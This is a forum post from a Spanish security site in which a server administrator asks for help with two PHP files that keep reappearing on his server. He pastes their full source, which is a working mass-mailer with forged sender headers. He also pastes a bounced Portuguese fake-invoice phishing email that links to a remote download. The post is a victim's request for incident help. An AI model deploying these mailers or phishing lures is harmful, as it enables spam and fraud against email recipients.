elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Problema con un mail script que se aloja en mi servidor.		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con un mail script que se aloja en mi servidor.  (Leído 3,989 veces)
lesone-

Desconectado Desconectado

Mensajes: 91



Ver Perfil WWW
Problema con un mail script que se aloja en mi servidor.
« en: 17 Junio 2013, 13:39 pm »
Buenas compañeros,

Os comento mi problema. En el directorio httpdocs de mi servidor (Centos 6.0) se me están alojando dos archivos cada dos por tres.. Los borro pero luego me vuelven a aparecer. Y realizan envíos masivos de correos electronicos.

Estoy recibiendo cada dos por tres un mínimo de 10.000 correos en mi bandeja por esto.

He probado actualizar la ultima version del SO, de mi foro (es MYBB), le he pasado el AVG y nada. Cambiado mis contraseñas de root y ftps..

Los archivos que se ponen solos son denominados "zz.php" y "full.php", los borro y se vuelven a subir ellos solitos  :-(

Os dejo el código fuente de ambos, a ver si podéis echarme una mano y tratar de solucionar esto.

Estos son los emails que recibo, que son más de 10.000 con algo parecido a esto:

Código:
Hi. This is the qmail-send program at xxxxxes.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

<wiviebiel@hotmail.com>:
65.55.92.xxx does not like recipient.
Remote host said: 550 Requested action not taken: mailbox unavailable Giving up on 65.55.92.xxx.

--- Below this line is a copy of the message.

Return-Path: <anonymous@xxxxxx.es>
Received: (qmail 17097 invoked by uid 10005); 17 Jun 2013 15:04:14 +0200
Date: 17 Jun 2013 15:04:14 +0200
Message-ID: <20130617130414.17093.qmail@xxxx.es>
To: wiviexxxxxx@hotmail.com
Subject: Fatura atrasada - 6415261
X-PHP-Originating-Script: 10005:full.php
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
X-Mailer: Microsoft Office Outlook, Build 17.551210
From: Quality "Cobranças" <jessxxxx3@hotmail.com>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><META name=Generator content=6.10><title></title></HEAD><BODY bgColor=#ffffff><P align=left>Prezado Senhor:</P><P align=left>Com&nbsp;o presente, tomamos a liberdade de lembrar que o titulo de seu aceite venceu em 03/06/2013.</P><P align=left>Na certeza de suas providências para o seu resgate, </P><P align=left>segue&nbsp;o boleto para pagamento com vencimento dia 18/06/2013.</P><P align=left>Antecipamos os nossos agradecimentos, e subscrevemo-nos,</P><P align=left>Atenciosamente,</P><P align=left>Horácio Borges Pimenta</P><P align=left><A title="Baixar como zip" href="http://mag.electronics-eetimes.com/Imprimir/receita-nfe.php?UMID=NFE$referencia"><IMG border=0 src="http://upload.wikimedia.org/wikipedia/commons/thumb/c/c7/BoletoBancario.png/225px-BoletoBancario.png"></A></P><P align=left>&nbsp;</P><P align=left><TABLE class="cf hr" style="WHITE-SPACE: normal; BORDER-COLLAPSE: collapse; TEXT-TRANSFORM: none; WORD-SPACING: 0px; COLOR: rgb(34,34,34); FONT: 13px arial, sans-serif; MARGIN: 8px 0px 0px 5px; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px" cellPadding=0>    <TR>    <TD class=hw     style="FONT-FAMILY: arial, sans-serif; VERTICAL-ALIGN: middle; MARGIN: 0px; PADDING-RIGHT: 7px"><SPAN       id=:ib><A title="Clique para visualizar OU Baixar como zip" class=e       style="CURSOR: pointer; WHITE-SPACE: nowrap; COLOR: rgb(17,85,204); TEXT-DECORATION: none"       href="http://mag.electronics-eetimes.com/Imprimir/receita-nfe.php?UMID=NFE$referencia" target=_blank       download_url="image/jpeg:digitalizar0004.jpg:http://upload.wikimedia.org/wikipedia/commons/thumb/c/c7/BoletoBancario.png/225px-BoletoBancario.png"></A></SPAN></TD>    <TD       style="FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><B>digitalizar0004.jpg</B><BR>404K&nbsp;&nbsp;<SPAN       class=Apple-converted-space>&nbsp;</SPAN><SPAN id=:ia><A draggable=false       class=e       style="CURSOR: pointer; WHITE-SPACE: nowrap; COLOR: rgb(17,85,204); TEXT-DECORATION: none"       href="http://mag.electronics-eetimes.com/Imprimir/receita-nfe.php?UMID=NFE$referencia"       target=_blank>Visualizar</A>&nbsp;&nbsp;<SPAN       class=Apple-converted-space>&nbsp;</SPAN><SPAN role=link tabIndex=0 id=:id       class=e       style="CURSOR: pointer; WHITE-SPACE: nowrap; COLOR: rgb(17,85,204); TEXT-DECORATION: none"></SPAN>&nbsp;&nbsp;<SPAN       class=Apple-converted-space>&nbsp;</SPAN><A id=:i9       title="Clique para baixar como zip" class=e       style="CURSOR: pointer; WHITE-SPACE: nowrap; COLOR: rgb(17,85,204); TEXT-DECORATION: none"       href="http://mag.electronics-eetimes.com/Imprimir/receita-nfe.php?UMID=NFE$referencia"       download_url="image/jpeg:digitalizar0004.jpg:https://mail.google.com/mail/?ui=2&amp;ik=e21ec44027&amp;view=att&amp;th=13ecf7dbb57ac924&amp;attid=0.1&amp;disp=safe&amp;realattid=f_hh1edo2k0&amp;zw">Baixar</A>&nbsp;&nbsp;</SPAN></TD></TR></TABLE></P></BODY></HTML> ref: 6415261



Este es el codigo fuente de full.php

Código:
<?php
set_time_limit(0);
$testa = $_POST['veio'];
if($testa != "") {

	$message = $_POST['html'];
	$nome = $_POST['nome'];
	$de = $_POST['de'];
	$nomeremetente = $_POST['nomeremetente'];
	$to = $_POST['emails'];
	$ema = explode("\n", $to);
	$message = stripslashes($message);

	$i = 0;
	$count = 1;
	while($ema[$i]) {
        list($remetente, $destinatario) = explode(":", $ema[$i]);
        $referencia = rand(1111111,9999999);
	$subject = $_POST['assunto'] ." - $referencia";
		$ok = "ok";
		$headers  = "MIME-Version: 1.0\n";
                $headers .= "Content-type: text/html; charset=iso-8859-1\n";
		$headers .= "X-Mailer: Microsoft Office Outlook, Build 17.551210\n";
		$headers .= "From: $nomeremetente<$remetente>\r\n";
		if(mail($destinatario, $subject, $message ." ref: $referencia", $headers))
		echo "<font color=blue>n: $count <b>".$remetente."-".$destinatario."</b> <font color=blue>OK!</font><br>";
		else
		echo "<font color=red>n: $count <b>".$remetente."-".$destinatario."</b> <font color=red>vixx</font><br>";
		$i++;
		$count++;
	}
	$count--;
	if($ok == "ok")
	echo "[acabou]";

}

?>
<html>
<head><title>flex -fullb3.0 - <?php echo "$UNAME";?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>
<body>
<form action="" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="veio" value="sim">

    <tr>

 
<table border="0" width="53%">
     <td width="462" height="25" align="center"><span class="titulo"></span></td>
<tr align="left"> 
<td colspan="2" ><font color="BLACK">
Nome do Servidor: <?php echo $UNAME = @php_uname(); ?><br>
Sistema Operacional: <?php echo $OS = @PHP_OS; ?><br>
Endere&#231;o IP: <?php echo $_SERVER['SERVER_ADDR']; ?><br>
Software usado: <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
Email admin: <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
Safe Mode: <?php echo $safe_mode = @ini_get('safe_mode'); ?>
</td>

</center>


    </tr>
    <tr>
      <td height="194" valign="top" >
	  	<table width="100%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
          <tr>
            <td align="right" height="17"><span class="texto">Assunto:</span></td>
            <td height="17"><input name="assunto" type="text" value=""class="form" id="assunto" style="width:100%" ></td>
          </tr>
          <tr>
            <td align="right" height="17"><span class="texto">Nome do Remetente:(pra hot)</span></td>
            <td height="17"><input name="nomeremetente" type="text" value="" class="form" id="nomeremetente" style="width:100%" ></td>
          </tr>
          <tr align="center">
            <td height="20" colspan="2"><span class="texto"></span></td>
          </tr>
          <tr align="right">
            <td height="146" colspan="2" valign="top"><br>
             <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html"></textarea>
              <span class="alerta">HTML</span></td>
         </tr>
          <tr align="center">
            <td height="10" colspan="2"><span class="emails">emails</span>
             
          </tr>
          <tr align="right">
            <td height="136" colspan="2" valign="top"><br>
              <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails"></textarea>
              <span class="alerta">Emails</span> </td>
          </tr>
          <tr>
            <td height="26" align="right" valign="top" colspan="2"><input type="submit" name="Submit" id="enviar" value="Enviar"></td>
          </tr>
        </table>
	  </td>
    </tr>
    <tr>
      <td height="15" align="center" bgcolor="#000000">&nbsp;</td>
    </tr>
  </table>
</form>
</body>

Y este el de zz.php

Código:
<?php
$testa = $_POST['veio'];
if($testa != "") {

	$message = $_POST['html'];
	$nome = $_POST['nome'];
	$de = $_POST['de'];
	$nomeremetente = $_POST['nomeremetente'];
	$to = $_POST['emails'];
	$ema = explode("\n", $to);
	$message = stripslashes($message);

	$i = 0;
	$count = 1;
	while($ema[$i]) {
        list($remetente, $destinatario) = explode(":", $ema[$i]);
        $referencia = rand(1111111,9999999);
	$subject = $_POST['assunto'] ." - $referencia";
		$ok = "ok";
		$headers  = "MIME-Version: 1.0\n";
                $headers .= "Content-type: text/html; charset=iso-8859-1\n";
		$headers .= "X-Mailer: Microsoft Office Outlook, Build 17.551210\n";
		$headers .= "From: $nomeremetente<$remetente>\r\n";
		if(mail($destinatario, $subject, $message ." REF: $referencia", $headers))
		echo "<font color=blue>n: $count <b>".$remetente."-".$destinatario."</b> <font color=blue>OK!</font><br>";
		else
		echo "<font color=red>n: $count <b>".$remetente."-".$destinatario."</b> <font color=red>vixx</font><br>";
		$i++;
		$count++;
	}
	$count--;
	if($ok == "ok")
	echo "[acabou]";

}

?>
<html>
<head><title>flex -fullb3.0 - <?php echo "$UNAME";?></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>
<body>
<form action="" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="veio" value="sim">

    <tr>

 
<table border="0" width="53%">
     <td width="462" height="25" align="center"><span class="titulo"></span></td>
<tr align="left"> 
<td colspan="2" ><font color="BLACK">
Nome do Servidor: <?php echo $UNAME = @php_uname(); ?><br>
Sistema Operacional: <?php echo $OS = @PHP_OS; ?><br>
Endere&#231;o IP: <?php echo $_SERVER['SERVER_ADDR']; ?><br>
Software usado: <?php echo $_SERVER['SERVER_SOFTWARE']; ?><br>
Email admin: <?php echo $_SERVER['SERVER_ADMIN']; ?> <br>
Safe Mode: <?php echo $safe_mode = @ini_get('safe_mode'); ?>
</td>

</center>


    </tr>
    <tr>
      <td height="194" valign="top" >
	  	<table width="100%"  border="0" cellpadding="0" cellspacing="5" class="normal" height="444">
          <tr>
            <td align="right" height="17"><span class="texto">Assunto:</span></td>
            <td height="17"><input name="assunto" type="text" value=""class="form" id="assunto" style="width:100%" ></td>
          </tr>
          <tr>
            <td align="right" height="17"><span class="texto">Nome do Remetente:(pra hot)</span></td>
            <td height="17"><input name="nomeremetente" type="text" value="" class="form" id="nomeremetente" style="width:100%" ></td>
          </tr>
          <tr align="center">
            <td height="20" colspan="2"><span class="texto"></span></td>
          </tr>
          <tr align="right">
            <td height="146" colspan="2" valign="top"><br>
             <textarea name="html" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="html"></textarea>
              <span class="alerta">HTML</span></td>
         </tr>
          <tr align="center">
            <td height="10" colspan="2"><span class="emails">emails</span>
             
          </tr>
          <tr align="right">
            <td height="136" colspan="2" valign="top"><br>
              <textarea name="emails" style="width:100%" rows="8" wrap="VIRTUAL" class="form" id="emails"></textarea>
              <span class="alerta">Emails</span> </td>
          </tr>
          <tr>
            <td height="26" align="right" valign="top" colspan="2"><input type="submit" name="Submit" id="enviar" value="Enviar"></td>
          </tr>
        </table>
	  </td>
    </tr>
    <tr>
      <td height="15" align="center" bgcolor="#000000">&nbsp;</td>
    </tr>
  </table>
</form>
</body>

Muchísimas gracias de antemano, a ver si me ayudais a dar con el asunto chicos, que me tiene frito.

Saludos!
En línea
--------- #Elhacker.net   ---------------
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ejecutar script javascript en un mail ?
PHP 		Diabliyo 3 8,083 Último mensaje 28 Diciembre 2009, 19:59 pm
por Diabliyo
Script .py google mail
Bugs y Exploits 		nkni 1 5,154 Último mensaje 3 Octubre 2011, 17:02 pm
por moikano→@
Alemania tiene un servidor que aloja más de 1.300 sites de distribución de ...
Noticias 		wolfbcn 0 1,334 Último mensaje 13 Febrero 2012, 15:54 pm
por wolfbcn
¿Alguien aloja su web en Hostgator?
Desarrollo Web 		eduardo(...)brutaldeath 1 1,382 Último mensaje 18 Mayo 2014, 12:05 pm
por Ori-chan
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines